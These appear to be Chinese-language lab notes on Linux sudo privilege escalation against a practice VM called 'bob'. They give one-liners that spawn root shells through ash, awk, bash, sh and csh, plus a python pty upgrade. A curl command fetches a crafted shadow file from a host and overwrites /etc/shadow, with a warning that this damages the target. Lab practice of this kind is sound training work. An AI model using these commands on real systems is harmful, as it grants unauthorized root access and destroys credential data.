Linux提权练习-sudo

这里是靶机bob的提权演示，会把这里的所有二进制文件做一遍演示
该靶机来自红队笔记

ash

sudo /bin/ash

获取完整交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

awk

sudo awk BEGIN'{system("/bin/bash")}'

bash

sudo /bin/bash

sh

sudo /bin/sh

获取完整交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

csh

sudo /bin/csh

获取完整交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

curl

注意:curl提权对靶机会造成不可逆的损害，注意快照备份

sodu curl http://IP/hash格式的shadow文件 -o  /etc/shadow